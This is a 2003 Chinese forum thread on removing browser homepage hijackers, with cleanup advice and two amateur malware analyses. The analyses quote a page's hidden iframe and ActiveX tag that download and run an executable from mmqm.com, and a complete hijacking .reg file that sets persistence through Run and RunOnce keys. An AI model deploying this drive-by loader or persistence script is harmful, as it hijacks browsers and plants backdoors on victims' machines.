9,506
社区成员
发帖
与我相关
我的任务
分享我的IE被一个网站强奸了。。。。怎么办??
小弟我的IE浏览器被一个叫www.ent8.com的网站强行设置成主页,每次打开都要先浏览他,通过internet属性海删不掉,设成空白页,在打开IE还是此网站主页,有请各位高人告知小弟怎么办?
...全文
请发表友善的回复…
发表回复
飓风2000 2003-10-24
- 打赏
- 举报
靠,写了那么一大篇子,麻烦死了,先用兔子魔法把自动加载项去掉,在进注册表把www.ent8.com相关的全删掉!
52today 2003-10-24
- 打赏
- 举报
我解决此类问题的简单方法:
1、记下篡改主页的那个网址
2、用3721上网助手一键搞定;
3、运行regedit注册表编辑器,编辑\查找 那个网址,逐一查找,把其键值删除;
4、清除收藏夹里的相关网址;
5、桌面上internet属性里面清除历史纪录和删除internet临时文件
6、重新启动计算机,一般问题都能解决。
1、记下篡改主页的那个网址
2、用3721上网助手一键搞定;
3、运行regedit注册表编辑器,编辑\查找 那个网址,逐一查找,把其键值删除;
4、清除收藏夹里的相关网址;
5、桌面上internet属性里面清除历史纪录和删除internet临时文件
6、重新启动计算机,一般问题都能解决。
wang821002 2003-10-24
- 打赏
- 举报
关于“流氓猪”网页恶意代码(或者也可叫病毒,最后才发现):
(以下论述只做业余研究之用,作者:wang821002)
a.表现:默认主页被修改成以下网站:
www.fun520.com,www.ktv530.com,www.ok530.com,www.7sou.com,and so on
b.危害:
修改ie,腾汛explorer等n种浏览器的主页设置,且用一般的注册表保护修改器很难预防和彻底清除。令人厌恶!!!
c.该病毒的组成:
该恶意代码共有5个文件组成,分别是:(以xp为例,2k,98类似,系统装在c盘)
c:\Documents and Settings\%账户名%\Local Settings\Temp\ktv530.exe
c:\windows\unicall.exe
c:\windows\system32\msater.exe
c:\windows\system32\restory.exe
c:\windows\system32\sysfiler.exe
只要有任一文件留存且其被执行时,其自生自动补充其余文件。
d.察看网页源代码的分析:
★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.html:
(截取部分)
<BODY text=#000000 bgColor=#b6e06f leftMargin=0 topMargin=0><IFRAME
src="★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.files/ktv530.htm"
width=0 height=0></IFRAME><IFRAME src="mhtml:http://www.mmqm.com/555/ktv530.mht"
width=0 height=0></IFRAME>
在此处ktv530.htm被调用!
ktv530.htm:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0035)http://www.mmqm.com/555/ktv530.html -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY>
<OBJECT codeBase=http://www.mmqm.com/555/WebDownLoadProj1.ocx#version=1,0,0,0
height=0 width=0 align=center
classid=clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D><PARAM NAME="StrUrl" VALUE="http://www.mmqm.com/555/ktv530.exe"></OBJECT></BODY></HTML>
可见他的来源是http://www.mmqm.com/555/ktv530.exe,首先被down到机器上的是这个文件,并被执行,然后产生了其余的四个文件!这时你可以在任务管理器的进程中看到msater.exe被加载。
e.修改注册表中的键值:
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Internet Explorer\Main
名称:Start Page 类型:REG_SZ 数据:www.fun520.com或www.ok530.net或www.7sou.com
(修改主页)
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:load 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\MSATER.EXE
(加载程序)
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:run 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\UNICALL.EXE
(检查复制程序)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:restory 类型:REG_SZ 数据:c:\windows\system32\restory.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:sysfiler 类型:REG_SZ 数据 c:\windows\system32\sysfiler.exe
(启动时自动加载)
(本人水平有限,只找到以上几个,若有其他发现不吝赐教)
f.对msater.exe(其他三个文件与其相同)的分析:
首先用language2000察看得:
版本信息:
文件名:msater.exe
注释:
版本:2.05
产品:windows
公司:流氓猪
编译器信息:
语言:C/C++
编译器:Visual C++
压缩/加密:
程序:ASPack
作者:Alexey Solodovnikov
URL:http://www.aspack.com/
尽然还打包了,有意思!!!!有趣的是当我用aspackdie解包后,我的金山毒霸2003病毒防火墙就向我发出了警告!信息如下:
文件:%path%\unpack.exe
感染:Modification.BackDoor.Generic.449 病毒
病毒介绍:
dos病毒或未知病毒。只能删除或隔离
我决定冒着危险跳过文件!!(从字面看相是个backdoor程序)
看来他并不是单纯的修改主页这么简单,大家可要看好自己的端口哦!
我想反编译这个程序来着,可惜水平有限,理解尚需时日。有那位大虾解释一下这个源程序,小弟不胜感激!
这还有一个问题就是病毒打包后就查不出来了?这个问题值得防病毒厂商好好研究研究!
g.关于这个病毒的防治:
清除:
删除上文提到的5个文件及所有相关的过期网页,删除所有提到的注册表里的键值,记得首要先把进程杀了(那5个文件加载的),在run中执行msconfig(xp,98使用),在启动项中去掉以上5个文件前面的钩(不一定全有),至此在小弟的机器上就没有再犯!
预防:
1.不打开不熟悉的网页,特别是网友发给你的,除非特别指明!!
2.注意病毒防火墙的病毒库的升级,这个还是有用的!
3.用一些注册表管理软件,其道一些防止恶意代码的作用。
4.在internet属性中的安全选项中,将安全级设到高。
......
以上是小弟在杀毒中的一点体会,就写下来工大家参考和一起研究!
(以下论述只做业余研究之用,作者:wang821002)
a.表现:默认主页被修改成以下网站:
www.fun520.com,www.ktv530.com,www.ok530.com,www.7sou.com,and so on
b.危害:
修改ie,腾汛explorer等n种浏览器的主页设置,且用一般的注册表保护修改器很难预防和彻底清除。令人厌恶!!!
c.该病毒的组成:
该恶意代码共有5个文件组成,分别是:(以xp为例,2k,98类似,系统装在c盘)
c:\Documents and Settings\%账户名%\Local Settings\Temp\ktv530.exe
c:\windows\unicall.exe
c:\windows\system32\msater.exe
c:\windows\system32\restory.exe
c:\windows\system32\sysfiler.exe
只要有任一文件留存且其被执行时,其自生自动补充其余文件。
d.察看网页源代码的分析:
★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.html:
(截取部分)
<BODY text=#000000 bgColor=#b6e06f leftMargin=0 topMargin=0><IFRAME
src="★☆Fun530★☆→www_Fun530_com 最流行的歌曲,最酷的动漫Flash尽在Fun530_Com永远提供给你最棒最全的歌曲欣赏^_^ 谢谢您.files/ktv530.htm"
width=0 height=0></IFRAME><IFRAME src="mhtml:http://www.mmqm.com/555/ktv530.mht"
width=0 height=0></IFRAME>
在此处ktv530.htm被调用!
ktv530.htm:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0035)http://www.mmqm.com/555/ktv530.html -->
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY>
<OBJECT codeBase=http://www.mmqm.com/555/WebDownLoadProj1.ocx#version=1,0,0,0
height=0 width=0 align=center
classid=clsid:36CB6B28-FC08-4373-8F54-1A02E3C15B7D><PARAM NAME="StrUrl" VALUE="http://www.mmqm.com/555/ktv530.exe"></OBJECT></BODY></HTML>
可见他的来源是http://www.mmqm.com/555/ktv530.exe,首先被down到机器上的是这个文件,并被执行,然后产生了其余的四个文件!这时你可以在任务管理器的进程中看到msater.exe被加载。
e.修改注册表中的键值:
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Internet Explorer\Main
名称:Start Page 类型:REG_SZ 数据:www.fun520.com或www.ok530.net或www.7sou.com
(修改主页)
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:load 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\MSATER.EXE
(加载程序)
HKEY_USERS\S-1-5-21-1202660629-688789844-1708537768-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows
名称:run 类型:REG_SZ 数据:C:\WINDOWS\SYSTEM32\UNICALL.EXE
(检查复制程序)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:restory 类型:REG_SZ 数据:c:\windows\system32\restory.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
名称:sysfiler 类型:REG_SZ 数据 c:\windows\system32\sysfiler.exe
(启动时自动加载)
(本人水平有限,只找到以上几个,若有其他发现不吝赐教)
f.对msater.exe(其他三个文件与其相同)的分析:
首先用language2000察看得:
版本信息:
文件名:msater.exe
注释:
版本:2.05
产品:windows
公司:流氓猪
编译器信息:
语言:C/C++
编译器:Visual C++
压缩/加密:
程序:ASPack
作者:Alexey Solodovnikov
URL:http://www.aspack.com/
尽然还打包了,有意思!!!!有趣的是当我用aspackdie解包后,我的金山毒霸2003病毒防火墙就向我发出了警告!信息如下:
文件:%path%\unpack.exe
感染:Modification.BackDoor.Generic.449 病毒
病毒介绍:
dos病毒或未知病毒。只能删除或隔离
我决定冒着危险跳过文件!!(从字面看相是个backdoor程序)
看来他并不是单纯的修改主页这么简单,大家可要看好自己的端口哦!
我想反编译这个程序来着,可惜水平有限,理解尚需时日。有那位大虾解释一下这个源程序,小弟不胜感激!
这还有一个问题就是病毒打包后就查不出来了?这个问题值得防病毒厂商好好研究研究!
g.关于这个病毒的防治:
清除:
删除上文提到的5个文件及所有相关的过期网页,删除所有提到的注册表里的键值,记得首要先把进程杀了(那5个文件加载的),在run中执行msconfig(xp,98使用),在启动项中去掉以上5个文件前面的钩(不一定全有),至此在小弟的机器上就没有再犯!
预防:
1.不打开不熟悉的网页,特别是网友发给你的,除非特别指明!!
2.注意病毒防火墙的病毒库的升级,这个还是有用的!
3.用一些注册表管理软件,其道一些防止恶意代码的作用。
4.在internet属性中的安全选项中,将安全级设到高。
......
以上是小弟在杀毒中的一点体会,就写下来工大家参考和一起研究!
linlin129 2003-10-23
- 打赏
- 举报
推荐3721
wizard0128 2003-10-23
- 打赏
- 举报
步骤:
1、运行msconfig,将启动方式改为诊断方式,停止所有的运行项。
2、重新启动,运行windows update,打上所有的补丁(关键更新)。
3、重新启动,运行regedit,搜索改你主页的网站地址,删除所有的键。
4、重新启动,运行msconfig,将启动方式改为正常启动方式,点击startup选项卡(最后那页),停止"regedit -s .."打头的启动项。
5、搞定!
1、运行msconfig,将启动方式改为诊断方式,停止所有的运行项。
2、重新启动,运行windows update,打上所有的补丁(关键更新)。
3、重新启动,运行regedit,搜索改你主页的网站地址,删除所有的键。
4、重新启动,运行msconfig,将启动方式改为正常启动方式,点击startup选项卡(最后那页),停止"regedit -s .."打头的启动项。
5、搞定!
wizard0128 2003-10-23
- 打赏
- 举报
这个问题我也碰到过。
下面我把的经历写出来,希望对你有帮助哦。
一个星期前无聊中上www.11311.com网站看免费电影,结果注册表文件被修改,,我的系统是windows2k,登陆首页变成了www.11311.com,从此麻烦开始了。历尽折腾,最终终于搞定,虽然这是一个不起眼的问题,但是却是一个烦人的问题,特别是对于初学者,不敢独享,于是把这个问题解决的体会写出来,希望对大家有所帮助。
第一个回合,把注册表中出现www.11311.com的键值,全部删掉,以为可以搞顶了,结果重新启动后,依然如此,看以下注册表,被删掉的键值有出现了,-----郁闷中啊
第二个回合,万般无奈中求助于网上形形色色的什么注册表修复工具(本人一向讨厌类似的工具,不要打我哦-------个人喜好而已 ^_^^_^^_^)。我使用了3721网络实名工具,结果还是不了了之,-----极度郁闷中啊
第三个回合,记得我以前使用过winxp版本的msconfig工具(win2k系统没有),于是没有办法的办法中,我把xp版本中的msconfig工具拷贝倒win2k系统下面,看看能不能正常使用,(因为我觉得windows系列系统的内核差不多都是一样的,这个办法具有理论上的可行性)结果--------------可行,万岁万岁万岁!!!
结局:当然了,顺利成章的看到在“msconfig系统配置使用程序”窗口的“启动”选项卡有一个选项为:SYSTEM ,目录为:c:\$NtUninstallQ887678$\system.cer
,于是找到该system.cer文件,打开一看,果然就是他。喜悦之情,就不用说了。第一个想法,就是赶紧把他给删掉。当然了,别忘了备份哦,万一删错了怎么办啊?? :)
后记,其实当我看到这个文件时,真的很吃惊,大家都是学计算机的,短短的十几行代码就能有如此的效果,一股好奇心里驱使着我好好的把这个vbsript文件仔细的研究了 一下,收获还是挺多的。
下面我把这个文件贴出来
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.11311.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.11311.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://www.11311.com"
"Default_Search_URL"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.11311.com"
"First Home Page"="http://www.11311.com"
"Default_Search_URL"="http://www.11311.com"
"Search Page"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
"Local Page"="http://www.11311.com"
[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://www.11311.com"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.11311.com"
"Search Page"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
"SearchURL"="http://www.11311.com"
"Start Page"="http://www.11311.com"
"First Home Page"="http://www.11311.com"
"Default_Page_URL"="http://www.11311.com"
"Local Page"="http://www.11311.com"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WlN32"="C:\\$NtUninstallQ887678$\\WINSYS.vbs"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WlN32"="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
应该说这个文件很典型,算个良性病毒,具有隐藏性,可传播性。
哎呀,打的手都累了,哈哈,就这样结束把。
原创:wizard0128
2003/10/19
如有转载请注明出处,谢谢合作!
以上是我的经历,可能木马不一样,建议如下:
1.木马一般都是以系统文件的状态存在,所以咱们就先把文件夹选项中的查看页卡中的 “隐藏受保护的操作文件系统(推荐)”这一项前面的 勾号 去掉,默认是带勾号的。
2.搜索 *.cer 或者 *.vbs 或者 system.*等查看有没有文件。
3.看看有没有类似这样的 $NtUninstallQ887678$ 隐藏文件件出现,这种文件夹特别注意。
4.估计这样差不多就搞定了。
最后,祝你好运。
下面我把的经历写出来,希望对你有帮助哦。
一个星期前无聊中上www.11311.com网站看免费电影,结果注册表文件被修改,,我的系统是windows2k,登陆首页变成了www.11311.com,从此麻烦开始了。历尽折腾,最终终于搞定,虽然这是一个不起眼的问题,但是却是一个烦人的问题,特别是对于初学者,不敢独享,于是把这个问题解决的体会写出来,希望对大家有所帮助。
第一个回合,把注册表中出现www.11311.com的键值,全部删掉,以为可以搞顶了,结果重新启动后,依然如此,看以下注册表,被删掉的键值有出现了,-----郁闷中啊
第二个回合,万般无奈中求助于网上形形色色的什么注册表修复工具(本人一向讨厌类似的工具,不要打我哦-------个人喜好而已 ^_^^_^^_^)。我使用了3721网络实名工具,结果还是不了了之,-----极度郁闷中啊
第三个回合,记得我以前使用过winxp版本的msconfig工具(win2k系统没有),于是没有办法的办法中,我把xp版本中的msconfig工具拷贝倒win2k系统下面,看看能不能正常使用,(因为我觉得windows系列系统的内核差不多都是一样的,这个办法具有理论上的可行性)结果--------------可行,万岁万岁万岁!!!
结局:当然了,顺利成章的看到在“msconfig系统配置使用程序”窗口的“启动”选项卡有一个选项为:SYSTEM ,目录为:c:\$NtUninstallQ887678$\system.cer
,于是找到该system.cer文件,打开一看,果然就是他。喜悦之情,就不用说了。第一个想法,就是赶紧把他给删掉。当然了,别忘了备份哦,万一删错了怎么办啊?? :)
后记,其实当我看到这个文件时,真的很吃惊,大家都是学计算机的,短短的十几行代码就能有如此的效果,一股好奇心里驱使着我好好的把这个vbsript文件仔细的研究了 一下,收获还是挺多的。
下面我把这个文件贴出来
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.11311.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.11311.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://www.11311.com"
"Default_Search_URL"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.11311.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.11311.com"
"First Home Page"="http://www.11311.com"
"Default_Search_URL"="http://www.11311.com"
"Search Page"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
"Local Page"="http://www.11311.com"
[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://www.11311.com"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.11311.com"
"Search Page"="http://www.11311.com"
"Search Bar"="http://www.11311.com"
"SearchURL"="http://www.11311.com"
"Start Page"="http://www.11311.com"
"First Home Page"="http://www.11311.com"
"Default_Page_URL"="http://www.11311.com"
"Local Page"="http://www.11311.com"
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"WlN32"="C:\\$NtUninstallQ887678$\\WINSYS.vbs"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WlN32"="regedit -s C:\\$NtUninstallQ887678$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
应该说这个文件很典型,算个良性病毒,具有隐藏性,可传播性。
哎呀,打的手都累了,哈哈,就这样结束把。
原创:wizard0128
2003/10/19
如有转载请注明出处,谢谢合作!
以上是我的经历,可能木马不一样,建议如下:
1.木马一般都是以系统文件的状态存在,所以咱们就先把文件夹选项中的查看页卡中的 “隐藏受保护的操作文件系统(推荐)”这一项前面的 勾号 去掉,默认是带勾号的。
2.搜索 *.cer 或者 *.vbs 或者 system.*等查看有没有文件。
3.看看有没有类似这样的 $NtUninstallQ887678$ 隐藏文件件出现,这种文件夹特别注意。
4.估计这样差不多就搞定了。
最后,祝你好运。
zhabozwzpt 2003-10-23
- 打赏
- 举报
用反黑精英很容易反它干掉,我已经用它来杀过两次了都成功了
hzy_csdn 2003-10-23
- 打赏
- 举报
兔子,
装防火墙
装防火墙
whzaaa 2003-10-23
- 打赏
- 举报
关键是修补漏洞,否则悲剧还会重演!
boyifeng 2003-10-21
- 打赏
- 举报
超级兔子魔法设置!
kittyhust 2003-10-21
- 打赏
- 举报
推荐3721,
但是一些系统软件也有这功能,比如说魔法兔子,优化大师等
修改之后要注意防范,最简单的是在控制面版—管理工具-服务
里面Remote Registry设为禁用,更改浏览器的扩展名也可以,比如说该为cmd
但是一些系统软件也有这功能,比如说魔法兔子,优化大师等
修改之后要注意防范,最简单的是在控制面版—管理工具-服务
里面Remote Registry设为禁用,更改浏览器的扩展名也可以,比如说该为cmd
prylm 2003-10-21
- 打赏
- 举报
最简单的办法就是上3721上面一键清除,我也被这样的网站黑过就是这样做的。如果不行的话可以照上面的同志说的做,你可以先试试3721,不错的。
frankMasson 2003-10-19
- 打赏
- 举报
我也遇到这个问题了,真是郁闷,不知道有没有人真正了解这个网站所用的这个鬼东西如何才能清理得掉,狂郁闷中
Jekey147 2003-10-19
- 打赏
- 举报
最直接的办法就是到http://www.hackbase.net下载最新的QQ专杀工具软件,然后再把主页改成自己想设的就可以啦
linucz 2003-10-19
- 打赏
- 举报
不要以为用一些专业工具吧注册表改回来就可以了,他有可能是通过程序修或脚本修改
sungod8 2003-10-18
- 打赏
- 举报
1.先看看任务管理器中是否有一些可疑的文件在运行,然后到SYSTEM和SYSTEM32中找到这个程序,删掉它,再改注册表或者用下面的:
2.通过恢复注册表:
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel\]
"homepage"=dword:00000000
3.还有一个更方便的办法,在“Internet选项”中打开“程序”页面,然后单击[重置Web设置]按钮,并在打开的对话框中选择“同时重置主页”选项后点击[确定]按钮就可以将主页设置成默认的微软网站。
4.使用工具:
IE 修复器集合:http://www.skycn.com/sort/sort2100900_indate_DESC_1.html
3721 修复网站:http://assistant.3721.com/
3721 修复网站:http://magic.3721.com/
金山毒霸注册表修复器修:http://www.duba.net/download/othertools/duba_regsolve.exe
5.在系统重新注册IE!
regsvr32 urlmon.dll
regsvr32 Shdocvw.dll
regsvr32 Msjava.dll
regsvr32 Actxprxy.dll
regsvr32 Oleaut32.dll
regsvr32 Mshtml.dll
regsvr32 Browseui.dll
regsvr32 Shell32.dll
2.通过恢复注册表:
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel\]
"homepage"=dword:00000000
3.还有一个更方便的办法,在“Internet选项”中打开“程序”页面,然后单击[重置Web设置]按钮,并在打开的对话框中选择“同时重置主页”选项后点击[确定]按钮就可以将主页设置成默认的微软网站。
4.使用工具:
IE 修复器集合:http://www.skycn.com/sort/sort2100900_indate_DESC_1.html
3721 修复网站:http://assistant.3721.com/
3721 修复网站:http://magic.3721.com/
金山毒霸注册表修复器修:http://www.duba.net/download/othertools/duba_regsolve.exe
5.在系统重新注册IE!
regsvr32 urlmon.dll
regsvr32 Shdocvw.dll
regsvr32 Msjava.dll
regsvr32 Actxprxy.dll
regsvr32 Oleaut32.dll
regsvr32 Mshtml.dll
regsvr32 Browseui.dll
regsvr32 Shell32.dll
icuc88 2003-10-18
- 打赏
- 举报
Step 1: msconfig查看启动,找到可疑程序
step 2: 启用任务管理器,结束可疑进程
Step 3: msconfig 去掉可疑启动
Step 4: 修复注册表
http://www.duba.net/download/3/8.shtml
Step 5: 找到可疑程序,删除
Step 6: 重新启动。
=======================================
由于windows 2000没有msconfig,可以拷贝xp的来使用。
或者:
http://soft.netnest.com.cn/soft/698.htm
http://www.downbest.net/down/html/4050.html
下载。
step 2: 启用任务管理器,结束可疑进程
Step 3: msconfig 去掉可疑启动
Step 4: 修复注册表
http://www.duba.net/download/3/8.shtml
Step 5: 找到可疑程序,删除
Step 6: 重新启动。
=======================================
由于windows 2000没有msconfig,可以拷贝xp的来使用。
或者:
http://soft.netnest.com.cn/soft/698.htm
http://www.downbest.net/down/html/4050.html
下载。
hanwen 2003-10-18
- 打赏
- 举报
多数是中毒了,你的机子有个“毒”程序了找到删除就没事了,同时还要改注册表www.ent8.com相关的内容。上网搜索www.ent8.com相关的吧
rockypan 2003-10-18
- 打赏
- 举报
进注册表,用查找功能找出含"www.ent8.com"的项,删之;
当然网上也有很多工具可以下载。
当然网上也有很多工具可以下载。
zsy104 2003-10-18
- 打赏
- 举报
该注册表
二用工具
简单的就是用3721网上助手
二用工具
简单的就是用3721网上助手
